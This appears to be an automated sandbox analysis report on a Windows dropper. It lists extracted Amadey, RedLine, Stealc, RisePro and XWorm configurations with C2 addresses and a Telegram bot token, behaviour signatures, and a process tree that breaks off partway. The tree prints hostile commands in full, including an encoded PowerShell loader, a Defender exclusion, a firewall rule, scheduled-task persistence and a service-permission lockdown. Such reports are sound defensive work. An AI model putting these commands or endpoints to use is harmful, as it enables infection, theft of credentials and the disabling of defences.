Analysis

  • max time kernel
    81s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-05-2024 03:42

General

  • Target

    9350a06e615b625989d9de6a2f755036ec37547d92e3ae1126f7cb6515be0255.exe

  • Size

    1.7MB

  • MD5

    18177a2e9f9814050365ddc0f535f25a

  • SHA1

    28c5cc2e11662f60ff5c0d944610ecb53664a898

  • SHA256

    9350a06e615b625989d9de6a2f755036ec37547d92e3ae1126f7cb6515be0255

  • SHA512

    b931dd58384322ba3bd7a8feadce0a25d33e6065c695b7d366f6d7323f1dfcc8d430ba0122174520dd972c2050083c80fb859cacb8d0b5e33995adb1e12fe34c

  • SSDEEP

    49152:IVgFEigclVWSgTDJwawtCXiKxz8DIgM0I:IVg+bWW1T95wtCXaDId

Malware Config

Extracted

Family

amadey

Version

4.20

Botnet

18befc

C2

http://5.42.96.141

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain

Extracted

Family

amadey

Version

4.20

Botnet

c767c0

C2

http://5.42.96.7

Attributes
  • install_dir

    7af68cdb52

  • install_file

    axplons.exe

  • strings_key

    e2ce58e78f631ed97d01fe7b70e85d5e

  • url_paths

    /zamo7h/index.php

rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

Botnet

zzvv

C2

http://23.88.106.134

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

xworm

C2

127.0.0.1:7000

beshomandotestbesnd.run.place:7000

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    taskmgr.exe

  • telegram

    https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

Extracted

Family

redline

Botnet

Vic

C2

beshomandotestbesnd.run.place:1111

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Xworm Payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • XMRig Miner payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 45 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 43 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\9350a06e615b625989d9de6a2f755036ec37547d92e3ae1126f7cb6515be0255.exe
    "C:\Users\Admin\AppData\Local\Temp\9350a06e615b625989d9de6a2f755036ec37547d92e3ae1126f7cb6515be0255.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:4380
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:776
        • C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1776
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1804
            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
              "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:2248
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                  PID:3580
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  6⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:496
                  • C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
                    "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
                    7⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4272
                  • C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
                    "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4216
              • C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe
                "C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2172
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  6⤵
                    PID:4432
                • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2504
                • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  PID:3676
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:996
                    • C:\Windows\SysWOW64\sc.exe
                      Sc stop GameServerClient
                      7⤵
                      • Launches sc.exe
                      PID:2500
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService remove GameServerClient confirm
                      7⤵
                      • Executes dropped EXE
                      PID:1028
                    • C:\Windows\SysWOW64\sc.exe
                      Sc delete GameSyncLink
                      7⤵
                      • Launches sc.exe
                      PID:2860
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService remove GameSyncLink confirm
                      7⤵
                      • Executes dropped EXE
                      PID:4052
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:484
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService start GameSyncLink
                      7⤵
                      • Executes dropped EXE
                      PID:1912
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                    6⤵
                      PID:1048
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        7⤵
                          PID:548
                        • C:\Windows\SysWOW64\sc.exe
                          Sc stop GameServerClientC
                          7⤵
                          • Launches sc.exe
                          PID:1352
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove GameServerClientC confirm
                          7⤵
                          • Executes dropped EXE
                          PID:4492
                        • C:\Windows\SysWOW64\sc.exe
                          Sc delete PiercingNetLink
                          7⤵
                          • Launches sc.exe
                          PID:1912
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove PiercingNetLink confirm
                          7⤵
                          • Executes dropped EXE
                          PID:948
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:1384
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService start PiercingNetLink
                          7⤵
                          • Executes dropped EXE
                          PID:1336
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                        6⤵
                          PID:5328
                          • C:\Windows\SysWOW64\sc.exe
                            Sc delete GameSyncLinks
                            7⤵
                            • Launches sc.exe
                            PID:5376
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService remove GameSyncLinks confirm
                            7⤵
                            • Executes dropped EXE
                            PID:5416
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:5448
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService start GameSyncLinks
                            7⤵
                            • Executes dropped EXE
                            PID:5504
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                          6⤵
                            PID:5712
                        • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:548
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            6⤵
                              PID:4348
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              6⤵
                                PID:3592
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                6⤵
                                • Loads dropped DLL
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1844
                            • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:3584
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                6⤵
                                  PID:4140
                              • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                                5⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                PID:1524
                                • C:\Windows\SysWOW64\schtasks.exe
                                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                                  6⤵
                                  • Creates scheduled task(s)
                                  PID:5196
                              • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:5608
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                  6⤵
                                  • UAC bypass
                                  • Windows security bypass
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3428
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe" -Force
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6136
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                    7⤵
                                      PID:5516
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      7⤵
                                        PID:6120
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                        7⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5972
                                        • C:\Users\Admin\Pictures\Cod6FRbI57QyAszhk5piWGin.exe
                                          "C:\Users\Admin\Pictures\Cod6FRbI57QyAszhk5piWGin.exe" /s
                                          8⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Writes to the Master Boot Record (MBR)
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5904
                                        • C:\Users\Admin\Pictures\Mhk73tb28BoT2wt2uCZ1GaMt.exe
                                          "C:\Users\Admin\Pictures\Mhk73tb28BoT2wt2uCZ1GaMt.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4344
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            9⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6064
                                          • C:\Users\Admin\Pictures\Mhk73tb28BoT2wt2uCZ1GaMt.exe
                                            "C:\Users\Admin\Pictures\Mhk73tb28BoT2wt2uCZ1GaMt.exe"
                                            9⤵
                                              PID:5740
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -nologo -noprofile
                                                10⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:5648
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                10⤵
                                                  PID:3652
                                                  • C:\Windows\system32\netsh.exe
                                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                    11⤵
                                                    • Modifies Windows Firewall
                                                    PID:2016
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  10⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:1664
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  10⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:5612
                                                • C:\Windows\rss\csrss.exe
                                                  C:\Windows\rss\csrss.exe
                                                  10⤵
                                                    PID:896
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -nologo -noprofile
                                                      11⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:5220
                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                      11⤵
                                                      • Creates scheduled task(s)
                                                      PID:3440
                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                      schtasks /delete /tn ScheduledUpdate /f
                                                      11⤵
                                                        PID:2604
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        11⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:708
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        11⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:2700
                                                      • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                        11⤵
                                                          PID:5768
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          11⤵
                                                          • Creates scheduled task(s)
                                                          PID:3660
                                                        • C:\Windows\windefender.exe
                                                          "C:\Windows\windefender.exe"
                                                          11⤵
                                                            PID:3528
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                              12⤵
                                                                PID:5272
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                  13⤵
                                                                  • Launches sc.exe
                                                                  PID:3332
                                                      • C:\Users\Admin\Pictures\BDd6IRH5LzQ1I2TlVST8HXix.exe
                                                        "C:\Users\Admin\Pictures\BDd6IRH5LzQ1I2TlVST8HXix.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:1472
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -nologo -noprofile
                                                          9⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3908
                                                        • C:\Users\Admin\Pictures\BDd6IRH5LzQ1I2TlVST8HXix.exe
